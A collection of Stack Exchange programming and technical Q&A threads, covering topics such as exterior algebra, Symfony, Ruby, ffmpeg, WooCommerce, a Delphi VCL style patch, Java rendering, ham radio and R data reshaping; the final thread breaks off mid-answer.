text
stringlengths
70
452k
dataset
stringclasses
2 values
Does a $p$-form eat $p$-vectors or $p$ number of vectors? A bilinear form is another term for a $2$-form. So does it eat $2$ distinct vectors or a single $2$-vector? Either. Both. After all, you can take $p$ vectors and wedge them together to get a $p$-vector. Given that you have used the [tag:exterior-algebra] tag, do you want to talk about skew forms? Sure. No idea what they are, but I am eager to learn as much as I can. bilinear forms, like quadratic forms, are not in an exterior algebra...unless, $b(v,w)=-b(w,v)$... in which case you can write $b$ as a wedge product of one-forms. @JamesS.Cook I'm confused as to the second part of your comment, I think you mean a linear combination of wedges if you intend that identity to be true for all $v,w$ since $\Lambda^k\left(\Bbb R^n\right)$ is only generated by the $k$-blades. @AdamHughes good point. I do mean to say a linear combination of wedge products. To elaborate on Zhen Lin's comment: either viewpoint of a bilinear form is okay due to the universal property of the tensor product. Given a vector space $V$ with field of scalars $k$, I've usually seen a bilinear form defined as a bilinear map $B : V \times V \to k$, so a function that eats two vectors as in your first definition. However, by the universal property of the tensor product, there is a unique linear map $\tilde{B} : V \otimes_k V \to k$ such that $B = \tilde{B} \circ \pi$ where $\pi$ is the map $\pi : V \times V \to V \otimes_k V$, $(v_1, v_2) \mapsto v_1 \otimes v_2$. So $\tilde{B}$ eats $2$-vectors, as in your second definition. Since this association $B \leftrightarrow \tilde{B}$ is a bijection, we can in a sense identify $B$ and $\tilde{B}$ and are thus free to think about a bilinear form as a map $V \times V \to k$ or $V \otimes_k V \to k$. For more on this see section 10.4 of Dummit and Foote. A bilinear form on a vector space $V$ over a field $\Bbb{F}$ is a bilinear map $B:V\times V\to \Bbb{F}$ which eats a pair of vectors to give a scalar according to $(v,w)\mapsto B(v,w)$. This can be generalized.
common-pile/stackexchange_filtered
Compiling LINQ expressions I'm wondering what steps the (v3+) compiler takes to build LINQ expressions for methods that take an expression argument. In particular, does the compiler use, or share logic with, LeafExpressionConverter? (That could require first generating an Expr then converting it.) If there is a separate mechanism, is anything done to ensure parity with LeafExpressionConverter? Yes, I believe that it uses LeafExpressionConverter.QuotationToLambdaExpression. Search for quote_to_linq_lambda_info in the open source compiler code base. Found it. Thanks.
common-pile/stackexchange_filtered
Symfony 3.0.1 EventDispatcher I'm writing a RequestListener and I look like to get the EventDispatcher. It was working on previous version of Symfony. I checked the CHANGELOG.md : The method getListenerPriority($eventName, $listener) has been added to the EventDispatcherInterface. The methods Event::setDispatcher(), Event::getDispatcher(), Event::setName() and Event::getName() have been removed. The event dispatcher and the event name are passed to the listener call. public function onKernelRequest(GetResponseEvent $event) { $dispatcher = $event->getDispatcher(); } How can I get the event dispatcher ? Thanks Read: The event dispatcher and the event name are passed to the listener call. Have you an example to use this ? The answer bellow (by @Cerad) is 100% correct. Take a look. ;) I've just tried and it's work, thanks. http://symfony.com/doc/current/components/event_dispatcher/introduction.html#eventdispatcher-aware-events-and-listeners public function onKernelRequest( GetResponseEvent $event, $eventName, EventDispatcherInterface $dispatcher) { }
common-pile/stackexchange_filtered
How to check ng-model variable value undefined using ng-change? if value is not selected for ng-model selectedFileSize its throwing error TypeError: Cannot read property 'size' of undefined when i click on button startRecording. How can i resolve this problem ? main.html <div class="col-md-3"> <select class="form-control" ng-model="selectedFileSize" ng-options="item as item.value for item in FileSizeOptions" ng-change="onSizeChange()"><option value="">Select</option></select> </div> <div class="col-md-2"> <button type="button" class="btn btn-primary" ng-click="startRecording()">Start Recording</button> </div> ctrl.js if (($scope.selectedFileSize.size !== "") || ($scope.selectedFileSize !== undefined)) { //logic here } Can you show us more of how you instantiated the selectedFileSize object? It sounds like the selectedFileSize is still undefined at this point. You need to check that selectedFileSize is populated before checking selectedFileSize.size: if ($scope.selectedFileSize && $scope.selectedFileSize.size) { //logic here } perfect it worked that's what i was looking for, Thank you boss!
common-pile/stackexchange_filtered
Printing Reports and invoices with Ruby? I just learn Ruby, and I wonder how to generate Reports and Invoices (with Logo, adressfield, footer, variable number of invoice-items (sometimes resulting in more than one page), carry over of the amount to pay from one page to the next, free-floating 2-column text (left-and-right-justified) below the resulting cash-informations). Currently I get a canvas to print and draw on from the OperatingSystem (matching the printer specifications) and use some draw-, move-, line-, text- and formfeed-API-Functions and do some heavy calculations for textblock-moving (a bit TeX-like). How will this be done in Ruby? Building an .odt and throw it to OpenOffice or a .tex and throw it to LaTeX? Or are there any free Libraries, thet do all this kind of things for me, so I only have to feed the relevant parts, and let Ruby do the Text-Formatting thing? EDIT: To be more specific: I want to put a corporation logo on the first page (DIN-A4-format, but may also be letter) on a specific position, also the footer on every page and the adress-box on the first page. all the rest should be free floating text blocks with left-right-justification, bold words in the middle of texts. something like pdf.column.blocktext("Hello Mr. P\nwe have [b]good news[/b] for you. bla bla bla and so on. Please keep this text together (no page break)..."); pdf.column.floatingblock("This is another block, that should be printed, and can be broken over more than one column..."); which should render the text in the corporate font on the paper, justified, and wrapping neatly to the next column/page if it reaches the bottom of the page. Thinking about it, this is exactly, what LaTeX is for. I suggest you consider PDF generation. In Rails, it's pretty simple with the Prawn library. There is also a fresh new Railcast about that. Official web site. thanks, that may be the right way, just i do not see the Block-Texting-functionality (like justification (Blocksatz)), but i will take some further looks You could also check out HtmlDoc for generating PDFs, it just takes in HTML and generates a PDF from it. This approach is nice because it lets you very easily reuse a partial for an on-screen and hard copy invoice. http://blog.adsdevshop.com/2007/11/20/easy-pdf-generation-with-ruby-rails-and-htmldoc/ link is 404 and from 2007 The Ruport library (Ruby Reports) makes it pretty easy to spit report tables out in multiple formats, including PDF. There's also a ActiveRecord hook acts_as_reportable that gives your models a reporting interface.
common-pile/stackexchange_filtered
ffmpeg increases video segments length when used with -segment_time - how to fix? I am trying to record rtmp stream to file, splitting every 10 seconds. My ffmpeg command is: ffmpeg -i rtmp://<IP_ADDRESS>:1935 -f segment -strftime 1 -segment_time 10 -segment_format avi E:\record\CAM1_%Y-%m-%d_%H-%M-%S.avi It works, but the created files are getting corrupted in some way. First file is OK, length is 10 sec; second file's length is 20 sec, and first 10 seconds is the static image; third file is 30 sec, and first 20 seconds are nothing but static image, and so on. What I'm doing wrong? AVI doesn't work with PTS, so you'll have to reset timestamps: ffmpeg -i rtmp://<IP_ADDRESS>:1935 -f segment -strftime 1 -reset_timestamps 1 -segment_time 10 -segment_format avi E:\record\CAM1_%Y-%m-%d_%H-%M-%S.avi
common-pile/stackexchange_filtered
Windows command line compression/extraction tool? I need to write a batch file to unzip files to their current folder from a given root folder. Folder 0 |----- Folder 1 | |----- File1.zip | |----- File2.zip | |----- File3.zip | |----- Folder 2 | |----- File4.zip | |----- Folder 3 |----- File5.zip |----- FileN.zip So, I wish that my batch file is launched like so: ocd.bat /d="Folder 0" Then, make it iterate from within the batch file through all of the subfolders to unzip the files exactly where the .zip files are located. So here's my question: Does the Windows (from XP at least) have a command line for its embedded zip tool? Otherwise, shall I stick to another third-party util? AFAIK, there is not unzip tool shipped as part of Windows XP, but there is gnu unzip which will do the job nicely for you. I've been told that there was this compression util embedded to Windows XP that is called compress.exe. Compress doesn't know how to do anything with ZIP files, and is not available in all versions of XP. If you need unzip functionality, you will need a 3rd party EXE. I have finally decided to use 7za.exe which is the command line version of 7-Zip.
common-pile/stackexchange_filtered
Prevent parent underline from underlining child element Given this pared-down test case: <!DOCTYPE html> <html><head><title>No Underline Please</title> <style type="text/css"> li { text-decoration:underline } li .rule { text-decoration:none ! important } </style> </head><body> <ol><li><span class="rule">RULE</span> CONTENT</li></ol> </body></html> I want to underline CONTENT but not underline RULE. However, Chrome, FF, and IE9 all underline RULE. Presumably this is standards-compliant behavior, given that they all agree. What spec am I forgetting that is preventing me from overriding the text-decoration? How can I achieve the result I want? Fiddle here: http://jsfiddle.net/F3Grr/ http://stackoverflow.com/questions/4481318/css-text-decoration-property-cannot-be-overridden-by-ancestor-element/4481356#4481356 The entire li element is being underlined. The li.rule rule is being rendered, but the underline applies to the entire list item. You should wrap the content you want to be underlined inside another inline element. Here's one example: <!DOCTYPE html> <html><head><title>No Underline! You're welcome.</title> <style type="text/css"> li span.emphasis { text-decoration:underline; } </style> </head><body> <ol><li>RULE <span class="emphasis">CONTENT</span></li></ol> </body></html> Thanks, I just realized the same thing. I'll accept your answer in 9 minutes if you change the class name to not describe the visual style being applied. ;) Haha, but you're ok with me indenting like that? Illustrative code differs from production code, imho. Note that while your answer (wrap the content you want to underline) is the correct workaround for this problem, as shown by this test we can see that text-decoration accumulates on descendants (rather than being inherited by them). Also interesting to note is this comment: "Firefox versions up to and including 3.5; Safari up to and including version 4; Chrome up to and including version 3; all propagate text decoration values to floating descendants." Even the modern browsers are not properly honoring the specs.
common-pile/stackexchange_filtered
Change all products to have the same shipping class within Woocommerce I've got a woocommerce shop with 1000+ products in it, however, I've notices that random products have no shipping class applied to them. So when customers get to the checkout, these items cause issues with shipping calculations. Is there any way to show a list of products with no shipping class, or change all products in the shop to the same shipping class without going through each products individually? I know i could use bulk actions to change them all, but there's 25+ pages, even when I change the amount of products shown. This should change the shipping class of all the published posts. Updated answer Just remembered about the fields parameter, so this is the new code: $shipping_class_slug = 'your-shipping-class-slug'; // get just the IDs of all products published $products = new WP_Query( array ( 'post_type' => 'product', 'posts_per_page' => -1, 'fields' => 'ids' )); // for each product change the shipping class foreach ( $products->posts as $pID ) { wp_set_object_terms( $pID, $shipping_class_slug, 'product_shipping_class' ); } Old answer $shipping_class_slug = 'your-shipping-class-slug'; // get all products published $products = new WP_Query( array ( 'post_type' => 'product', 'posts_per_page' => -1 )); // retrieve products IDs $productsIDs = wp_list_pluck( $products->posts, 'ID' ); // for each product change the shipping class foreach ( $productsIDs as $pID ) { wp_set_object_terms( $pID, $shipping_class_slug, 'product_shipping_class' ); } You can wrap it in a function (in your functions.php file) to call with an action. Remember to change 'your-shipping-class-slug' with the one you want. And most of all: DO A BACKUP before you try anything! ;) (better: clone the website locally and try there first)
common-pile/stackexchange_filtered
Home-brew 10 meter walkie talkies? "When I was in high school, we had 8 hams at once. (Probably rare) 4 of us built little 10 meter walkie-talkies and had great fun using them on Field Day, hiking or around town. It was especially fun because this was pre-cellphone and ordinary non-ham folks could not buy any kind of walkie-talkie. We were hi-tech and really cool. Now the average kid has unused Radio shack talkies in his dresser and couldn't care less about them." That is from the author of Crystal Sets to Sideband. Now I'm in the generation of the "radio shack unused walkie talkies" and I want to build myself a 10 meter walkie talkie. I have fairly descent soldering skills and I have been building electronics for about 5 years (I probably started when I was 10) How can I build a 10 meter handheld, and what parts do I need. I would like getting transistors, inductors, etc and building the whole thing with discrete components (no IC's) Related: Can a licensed ham use or modify CB equipment to work the 10 Meter Amateur bands? Remember that those old ones were limited to 100 mW. It is fun to be nostalgic, but that is only good enough for a big yard. FRS radios can go much further. But I admire your "build it myself" spirit. I built my first 80 meter CW transmitter on the top of a cigar box with coils wound on my aunt's hair curlers and a couple of transistors. Those were the days, my friend. More to your point, I recently bought a pair of those old-style CB handhelds like I had when we were kids in the 60s. These are much smaller, and they have reminded me of one part I had forgotten: They have no squelch. ;-) On the flip side, I also remember busy signals. When was the last time you heard one of those? The times, they are a-changin' I am not sure if you are asking about converting a CB walkie-talkie to 10m or building one from scratch so I will address both, not feeling like working at the moment: Converting a CB walkie-talkie What it will take to Convert a CB walkie-talkie is going to depend on how it's contructed, of course. It can be as simple as replacing one or more crystals. A cheap one will have one offset crystal to move the channels up into the CB range. Fancier ones might have several crystals. Basically you want to move it "up" 2MHz to get you into about 29MHz. You'll be stuck with the channel concept on the frequencies of the crystals, of course, but that can be OK. A newer CB will probably have some sort of DDS which would make it much much harder to convert. As a note, CB radios are (usually) AM, and while this is fine on 10m, that's something to remember. Newer ones support SSB as well, but might be much more difficult to mod. If you want to get crazy you can figure out how to supress the carrier and do DSB or supress both the carrier and the lower sideband. Even more adventurous would be to disconnect the AM modulator, add an FM detector chip (I know you want discrete, but this is just blue sky stuff) and modulating the VCO, then you'd be doing FM. Although these days most repeaters have a PL, which makes this mod a lot less useful. Homebrew 10m walkie-talkie Poking around on the net, there are a bunch of QRP 10m transceivers that could be built into a walkie-talkie form factor. This one looks pretty doable: The only IC is a small op-amp for the audio out. Looking the schematic over, it's setup for 220V AC power (the author is Australian, but he's probably OK despite that :) ). Since you are going to want to run on battery, you can axe that whole section and wire the DC source right in. Another option is a 14MHz SSB transceiver. This page details an all discrete component version that will run on battery power. You can either roll with it on 20m or convert it up to 10m. Happy Soldering. The only HT kit I've ever seen in my searches was the "TJ2B MK2 5 Band SSB Handheld Transceiver" from Youkits. From Youkits themselves: TX/RX: 5-21MHz, covering 60m, 40m, 20m,17m and 15m band (No TX on 30m) So it won't work on the 10m band, but it will work on 5 other bands. However WB8YQJ's eHam review says this: The new TJ2B "Kit B" seemed ideal, offering 14Mhz to 30Mhz SSB +(CW Receive) in a handheld case and $269 plus ship. The TJ2B shows sold out on the YouKits web site, and the last update there is from 2015 (i.e. answer is now obsolete). Further, they apparently only sell "fully assembled and tested" products now. About as simple as a half-watt can get. What's the source of this schematic? Check out the ham swapmeets for a used AEA 10 meter Dx handy, I pickup one at the Williams AZ hamfst for a $100, very well made worked several states including Hawaii, converting a CB walkie talkie would not be that worth while as these radios operate in the Am mode, my honest opinion I would avoid the radios made in China as I feel their quality control is not that good, and if the radio is defective where will you get it fixed ? Ship it back to China ? The Japanese radios are far better made ! Check ot the potable FT-817ND The question was about home-brew how-to, not for a product recommendation. The best little book you can get yourself is How to Make Walkie-Talkies, a Bernard Babani book by F. G. Rayer. It is simple and you can make everything yourself for 27 MHz and 28 MHz TX and RX, wind your own coils, etc., and using ordinary transistors build a few of the circuits great for experimenting with. Also for more serious stuff, books are in French but circuits are good: a set of 4 or more books by Pierre Duranton on CB and ham radio, Émetteurs - récepteurs, Walkies - talkies. All make-it-yourself stuff including details of making chokes etc. Best books around. I collected them all over the years and made my first walkie talkies at the age of 11. 50 mW 27 MHz single channel 7 transistor AF115 OC71 types worked OK; short range but they got me into electronics and still going at 58. Enjoy. This isn't really answering the question. It's better to include at least some of the material when referencing such sources, because it can sometimes become obsolete otherwise.
common-pile/stackexchange_filtered
How to schedule a shell script using crontab I want to schedule a shell script to run everyday excluding sunday at 7:30 pm using crontab can you please help Check this tool, it will help you to build the crontab line: http://www.corntab.com/pages/crontab-gui Quick answer: 30 7 * * 1,2,3,4,5,6 /your/command/to/run
common-pile/stackexchange_filtered
Ruby on Rails uncapitalize first letter I'm running Rails 2.3.2. How do I convert "Cool" to "cool"? I know "Cool".downcase works, but is there a Ruby/Rails method that does the opposite of capitalize, i.e., uncapitalize or decapitalize? There is no inverse of capitalize, but you can feel free to roll your own: class String def uncapitalize self[0, 1].downcase + self[1..-1] end end Where should we add this method? @Vadorequest The method? Add it on the String class, as shown in the answer. In a standard Rails app, it would probably make sense to add it to a new file in /config/initializers @Ajedi32 Well, it maybe looks obvious to you, but not to me. Thanks Dave. There is also: "coolat_cat".camelize(:lower) # => "coolCat" This does require ActiveRecord tho : http://apidock.com/rails/String/camelize (After reading the question, it does state it is already with Rails) @Ian Vaughan: ActiveSupport to be more precise They updated the method signature around v4.2.7. It now takes a boolean, like camelize(uppercase_first_letter = true) http://apidock.com/rails/v4.2.7/String/camelize @animatedgif there's two methods, Inflector.#camelize(term, uppercase_first_letter) which takes a string to camelize and a boolean, String#camelize(first_letter) which camelizes self and takes a symbol :upper or :lower. I think the apidock docs are in error. Definitely a rails thing but damn its nice to have! You could also do this with a simple sub: "Cool".sub(/^[A-Z]/) {|f| f.downcase } note that "Cool".sub(/^[A-Z]/, &:downcase) is enough "CoolTrick".sub(/^[[:alpha:]]/) {|f| f.downcase } str = "Directly to the south" str[0] = str[0].downcase puts str #=> "directly to the south" This not only the most readable method, but also and by far the most performant one, even if you protect it by some kind of ternary operator or if statement to ensure that str is not nil. This should be the accepted answer. Thanks @boulder_ruby There is no real inverse of capitalize, but I think underscore comes close. "CoolCat".underscore #=> "cool_cat" "cool_cat".capitalize #=> "Cool_cat" "cool_cat".camelize #=> "CoolCat" Edit: underscore is of course the inverse of camelize, not capitalize. You can use tap (so that it fits on one line): "JonSkeet".tap { |e| e[0] = e[0].downcase } # => "jonSkeet" String#downcase_first (Rails 7.1+) Starting from Rails 7.1, there is a String#downcase_first method: Converts the first character to lowercase. For example: 'If they enjoyed The Matrix'.downcase_first # => "if they enjoyed The Matrix" 'I'.downcase_first # => "i" ''.downcase_first # => "" Sources: String#downcase_first. ActiveSupport::Inflector#downcase_first. Add String#downcase_first method. There is an inverse of capitalize called swapcase: "Cool Cat".swapcase #=> "cOOL cAT" If you use Ruby Facets, you can lowercase the first letter: https://github.com/rubyworks/facets/blob/master/lib/core/facets/string/uppercase.rb name = "Viru" name = name.slice(0).downcase + name[1..(name.length)] Try this 'Cool'.sub(/^([A-Z])/) { $1.tr!('[A-Z]', '[a-z]') } https://apidock.com/ruby/XSD/CodeGen/GenSupport/uncapitalize
common-pile/stackexchange_filtered
Send plain text email using EmailModel? I currently have a plugin that's successfully sending email using EmailModel(). The problem is: it's sending a multi-part email with HTML and plain text components. For this particular email, it would be best if I could just send the plain text portion. Is there a way to disable the HTML segment when sending via EmailModel()? Currently not. If Craft sees that there isn't anything specified for the htmlBody property of EmailModel will run the body property though Markdown and set that to htmlBody. Ok, good to know. I've managed to get a minimal version of the HTML working as expected, so it probably won't be too bad. Thanks for the confirmation, though! I see this is still the case. It's actually a real pain not being able to send plain text emails. I'm having to roll back to php mail() to get the job done for my purpose. @JamesNZ You should consider thumbs-upping/leave a comment here: https://github.com/craftcms/cms/issues/1107
common-pile/stackexchange_filtered
Nerve parasite in short story The short story I refer to began with a cave in, collapse, or other type of mass accident where only one person lived. The parasite jumped from its dying host into that last living person. -- Im a little unclear of detail beyond this point, but the new host was rescued. Turns out he was already suffering a terminal disease. He did battle with the parasite to the point of ending his life in isolation so it would have nowhere to go. ---- I sure would like to read it again! A little more detail that might help: The guy was a Dr, I think. Anyway he had good physiological knowledge. He was able use this to surgically thwart the parasite trying to control his body as he took his life. The mental/physical battle was short in duration but VERY well developed in the story. I read it about 12 yrs ago. I thought it was a Stephen King, but havent been able to [re] find it. Take a look at this guide to help jog your memory and [edit] any more details. Also, take a look at our [tour] to get a better understanding of our site and earn your first badge! Some plot resemblance to the movie Fallen, but doesn't seem to be a match. This is "The Autopsy" by Michael Shea. The alien parasite is found in the body of a miner who died in a mine collapse by the doctor doing the autopsy. As you say, the doctor has cancer, and deals with the parasite by allowing it to infect him, and then committing suicide. The story can be read in its entirety at the Internet Archive. This story was also the unaccepted answer to this old question: Story identification: medical examiner vs. alien parasite
common-pile/stackexchange_filtered
TActionMainMenuBar, VCL-Styles and MDI buttons(Minimize, Close etc) not being styled. I'm trying to make TActionMainMenuBar display styled MDI buttons like a TMainMenu does. Any suggestions? I can't stop using MDI for this project. You could always stop using VCL styles....... MDI was spawned with the idea of a single parent window hosting multiple instances of the same class of "document", Frames allow you to do just that without the unnecessary hassle for the developer and the user. Can you include a sample code to reproduce the issue? @RRUZ , in IDE create new MDI application, add ActionManager & ActionMainMenuBar to main form, use Vcl Styles, run project and cascade new child form. @RRUZ As Peter Vonča said. But you need to maximaze the child window. Ok, first this is not a Vcl Styles bug, this is a VCL bug. This issue appears even if the Vcl Styles Are disabled. The issue is located in the TCustomMDIMenuButton.Paint method which uses the old DrawFrameControl WinAPi method to draw the caption buttons. procedure TCustomMDIMenuButton.Paint; begin DrawFrameControl(Canvas.Handle, ClientRect, DFC_CAPTION, MouseStyles[MouseInControl] or ButtonStyles[ButtonStyle] or PushStyles[FState = bsDown]); end; As workaround you can patch this method using a detour and then implementing a new paint method using the StylesServices. Just add this unit to your project. unit PatchMDIButtons; interface implementation uses System.SysUtils, Winapi.Windows, Vcl.Themes, Vcl.Styles, Vcl.ActnMenus; type TCustomMDIMenuButtonClass= class(TCustomMDIMenuButton); TJumpOfs = Integer; PPointer = ^Pointer; PXRedirCode = ^TXRedirCode; TXRedirCode = packed record Jump: Byte; Offset: TJumpOfs; end; PAbsoluteIndirectJmp = ^TAbsoluteIndirectJmp; TAbsoluteIndirectJmp = packed record OpCode: Word; Addr: PPointer; end; var PaintMethodBackup : TXRedirCode; function GetActualAddr(Proc: Pointer): Pointer; begin if Proc <> nil then begin if (Win32Platform = VER_PLATFORM_WIN32_NT) and (PAbsoluteIndirectJmp(Proc).OpCode = $25FF) then Result := PAbsoluteIndirectJmp(Proc).Addr^ else Result := Proc; end else Result := nil; end; procedure HookProc(Proc, Dest: Pointer; var BackupCode: TXRedirCode); var n: NativeUInt; Code: TXRedirCode; begin Proc := GetActualAddr(Proc); Assert(Proc <> nil); if ReadProcessMemory(GetCurrentProcess, Proc, @BackupCode, SizeOf(BackupCode), n) then begin Code.Jump := $E9; Code.Offset := PAnsiChar(Dest) - PAnsiChar(Proc) - SizeOf(Code); WriteProcessMemory(GetCurrentProcess, Proc, @Code, SizeOf(Code), n); end; end; procedure UnhookProc(Proc: Pointer; var BackupCode: TXRedirCode); var n: NativeUInt; begin if (BackupCode.Jump <> 0) and (Proc <> nil) then begin Proc := GetActualAddr(Proc); Assert(Proc <> nil); WriteProcessMemory(GetCurrentProcess, Proc, @BackupCode, SizeOf(BackupCode), n); BackupCode.Jump := 0; end; end; procedure PaintPatch(Self: TObject); const ButtonStyles: array[TMDIButtonStyle] of TThemedWindow = (twMDIMinButtonNormal, twMDIRestoreButtonNormal, twMDICloseButtonNormal); var LButton : TCustomMDIMenuButtonClass; LDetails: TThemedElementDetails; begin LButton:=TCustomMDIMenuButtonClass(Self); LDetails := StyleServices.GetElementDetails(ButtonStyles[LButton.ButtonStyle]); StyleServices.DrawElement(LButton.Canvas.Handle, LDetails, LButton.ClientRect); end; procedure HookPaint; begin <EMAIL_ADDRESS>@PaintPatch, PaintMethodBackup); end; procedure UnHookPaint; begin <EMAIL_ADDRESS>PaintMethodBackup); end; initialization HookPaint; finalization UnHookPaint; end. The result will be You are welcome, don' forget report this issue to the QC site http://qc.embarcadero.com/wc/qcmain.aspx
common-pile/stackexchange_filtered
head problem: just two non adjacent columns please So I was trying to look at a few columns and did head(mydf[76:82], n=20), which got me columns 76:82, for 20 rows. Excellent. Just what I wanted. Next, however, I want to get just columns 76 & 82. I tried the following: head(tu_timeadd[76&82]) #which just gave me the whole dataframe head(tu_timeadd[76,82]) #which I'm pretty sure gave me the value for column 76, row 82? head(tu_timeadd[76 |82]) #which gave me the whole thing again anyway to just spit out the first few rows of columns 76 & 82 without having to subset it out? head(tu_timeadd[c(76,82)]) Thanks so much! FYI, [76&82] fails because in R, x&y is a logical operation, and anything non-zero is TRUE, meaning this is interpreted as [TRUE&TRUE] --> [TRUE] --> all data; [76|82] is very much the same issue. [76,82] is row 76, column 82, I suggest you read more on ?[.
common-pile/stackexchange_filtered
Java low FPS on PC comparing to laptop I've just started developing simple 2D game in Java. I splitted update from draw methods. Update refreshes at specific speed of 60fps while drawing is as fast as possible. When I wrote simple FPS counter of draw and send this to friends I discovered that on laptops it has at least 200fps when on PCs it has maximum of 35. I wonder what it may be caused by. Here is Base class: public class Base{ public static boolean isGameRunning; private static Draw d; public static void main(String[] args) { isGameRunning = true; Game g = new Game(); d = new Draw(g); Thread draw = new Thread(d); Thread update = new Thread(new Update(g)); GraphicsEnvironment env = GraphicsEnvironment.getLocalGraphicsEnvironment(); GraphicsDevice gd = env.getDefaultScreenDevice(); JFrame window = new JFrame(); setWindow(window); window.setContentPane(d); gd.setFullScreenWindow(window); g.initialize(); draw.start(); update.start(); } private static void setWindow(JFrame window) { window.setUndecorated(true); window.setResizable(false); window.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); }} And a Draw class here: package basic; import java.awt.*; import javax.swing.JPanel; import main.Game; class Draw extends JPanel implements Runnable { private static final long serialVersionUID = 1L; private Game g; public Color bgColor = Color.BLACK; Draw(Game g) { this.g = g; } public void run() { paintComponent(getGraphics()); while(Base.isGameRunning) { repaint(); } } public void paintComponent(Graphics graph) { try { Graphics2D g2d = (Graphics2D) graph; g2d.clearRect(0, 0, getWidth(), getHeight()); g2d.setColor(bgColor); g2d.fillRect(0, 0, getWidth(), getHeight()); g.draw(g2d); }catch(NullPointerException e) { } } } [EDIT] Here is an update class: package basic; import main.Game; class Update implements Runnable{ private final int FPS = 60; private long targetTime = 1000/FPS; //private Game g; //Update(Game g) //{ //this.g = g; //} public void run() { long start, elapsed, wait; while(Base.isGameRunning) { start = System.nanoTime(); //g.update(); elapsed = System.nanoTime() - start; wait = targetTime - elapsed / 1000000; try { Thread.sleep(wait); } catch (InterruptedException e) { e.printStackTrace(); } } } } Some improvement can be done. I tried to change the code as you didn't provide the Update class. import java.awt.GraphicsDevice; import java.awt.GraphicsEnvironment; import javax.swing.JFrame; import javax.swing.SwingUtilities; /** * * @author Pasban */ public class Base { public static boolean isGameRunning; private static Draw d; public static void main(String[] args) { isGameRunning = true; d = new Draw(); Thread draw = new Thread(d); GraphicsEnvironment env = GraphicsEnvironment.getLocalGraphicsEnvironment(); GraphicsDevice gd = env.getDefaultScreenDevice(); JFrame window = new JFrame(); setWindow(window); window.setContentPane(d); gd.setFullScreenWindow(window); //g.initialize(); draw.start(); } private static void setWindow(JFrame window) { window.setUndecorated(true); window.setResizable(false); window.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); } } And import java.awt.Color; import java.awt.Graphics; import java.awt.Graphics2D; import javax.swing.JPanel; /** * * @author Pasban */ class Draw extends JPanel implements Runnable { private static final long serialVersionUID = 1L; public Color bgColor = Color.BLACK; private long timer; private long lastTime; private int FPS; private int FPSLast; public void run() { paintComponent(getGraphics()); this.timer = System.currentTimeMillis(); this.lastTime = 0; this.FPS = 0; this.FPSLast = 0; while (Base.isGameRunning) { repaint(); } } public void paintComponent(Graphics graph) { try { Graphics2D g2d = (Graphics2D) graph; //g2d.clearRect(0, 0, getWidth(), getHeight()); g2d.setColor(bgColor); g2d.fillRect(0, 0, getWidth(), getHeight()); //g.draw(g2d); g2d.setColor(Color.WHITE); long dist = System.currentTimeMillis() - this.timer; if (dist - this.lastTime > 1000) { this.lastTime = dist; this.FPSLast = this.FPS; this.FPS = 0; } this.FPS++; g2d.drawString(dist + "ms / " + this.FPSLast + "fps", 50, 50); } catch (NullPointerException e) { } } } currently the FPS in my old PC is 103 by the above codes. The main change I applied is on this line: //g2d.clearRect(0, 0, getWidth(), getHeight()); By enabling this line, the FPS downwards to 70FPS which means this line itself uses 50+FPS. However, let it be disables as you fill the drawing rect after this command, and again that means you use your CPU and FPS for no reason and it will have no effect on your drawing canvas. One more improvement can be fixing your FPS by applying Thread.sleep(time) if it is beyond 60+FPS. Or you can ignore repaint method within your while (Base.isGameRunning) when it is too early to repaint. I didn't help :/ I have added Update. And have you got any idea why on laptops it seems to work properly? I think you need to check if your graphic card is the same as your friend's. If you compare the device features, you will find the reason. I don't have any external GraphicCard but, when I had one, the graphical processes were running much more faster. It is obvious that instead of accessing your main RAM, it access to its own ram which it is faster. That is what I think. Maybe someone else has better explanation.
common-pile/stackexchange_filtered
Update multiple documents I want to update multiple documents in elasticsearch. The update should correspond the SQL query UPDATE tablename SET expired=true where id not in (list_of_ids) Is it possible, or do you recommend different solution of keeping track of active and inactive documents? I want to keep and use inactive documents to statistic purposes. Thanks This can be easily done with the update by query API, like this: POST index/_update_by_query { "script": { "inline": "ctx._source.expired = true" }, "query": { "bool": { "must_not": { "ids": { "values": [1, 2, 3, 4] } } } } } Thanks, thats the solution. In Python with elasticsearch I just had to execute es.update_by_query(index, doctype, body) where body is json you provided..
common-pile/stackexchange_filtered
How to reshape a dataframe with duplicated rows into rownames and colnames I have been struggling with reshaping the following dataframe: geneSymbol <- c(rep("gene1",4),rep("gene2",4),rep("gene3",4)) Sample_name <- rep(c("sample1","sample2","sample3","sample4"),3) log2FC <- c(1.5,-1.0,0.5,0.2,-0.3,-0.7,-0.12,0.33,0.64,-0.17,2.3,-1.7) df <- data.frame(geneSymbol, Sample_name, log2FC) > df geneSymbol Sample_name log2FC 1 gene1 sample1 1.50 2 gene1 sample2 -1.00 3 gene1 sample3 0.50 4 gene1 sample4 0.20 5 gene2 sample1 -0.30 6 gene2 sample2 -0.70 7 gene2 sample3 -0.12 8 gene2 sample4 0.33 9 gene3 sample1 0.64 10 gene3 sample2 -0.17 11 gene3 sample3 2.30 12 gene3 sample4 -1.70 where the 'geneSymbol' and 'Sample_name' columns have duplicated rows for each. I have been trying to reshape this dataframe into a dataframe which has the 'geneSymbol' as its rownames and the 'Sample_name' as its colnames, which should look as follows: sample1 sample2 sample3 sample4 gene1 1.50 -1.00 0.50 0.20 gene2 -0.30 -0.70 -0.12 0.33 gene3 0.64 -0.17 2.30 -1.70 I manually crete this table myself, but I have no idea which function I need to use to make this dataframe or table from df with lines of code as I have hundreds of rows in my dataframe. I would really appreciate it if anyone can help this out for me. Best wishes, TJ using tidyr: tidyr::pivot_wider(df,values_from = 'log2FC',names_from = 'Sample_name') geneSymbol sample1 sample2 sample3 sample4 gene1 1.5 -1 0.5 0.2 gene2 -0.3 -0.7 -0.12 0.33 gene3 0.64 -0.17 2.3 -1.7 xtabs(log2FC ~ geneSymbol + Sample_name, df) Sample_name geneSymbol sample1 sample2 sample3 sample4 gene1 1.50 -1.00 0.50 0.20 gene2 -0.30 -0.70 -0.12 0.33 gene3 0.64 -0.17 2.30 -1.70 Using acast library(reshape2) acast(df, geneSymbol ~ Sample_name, value.var = 'log2FC') sample1 sample2 sample3 sample4 gene1 1.50 -1.00 0.50 0.20 gene2 -0.30 -0.70 -0.12 0.33 gene3 0.64 -0.17 2.30 -1.70 Here is the data.table pendant using dcast: library(data.table) setDT(df) dcast(df, geneSymbol ~ Sample_name, value.var = "log2FC") geneSymbol sample1 sample2 sample3 sample4 1: gene1 1.50 -1.00 0.50 0.20 2: gene2 -0.30 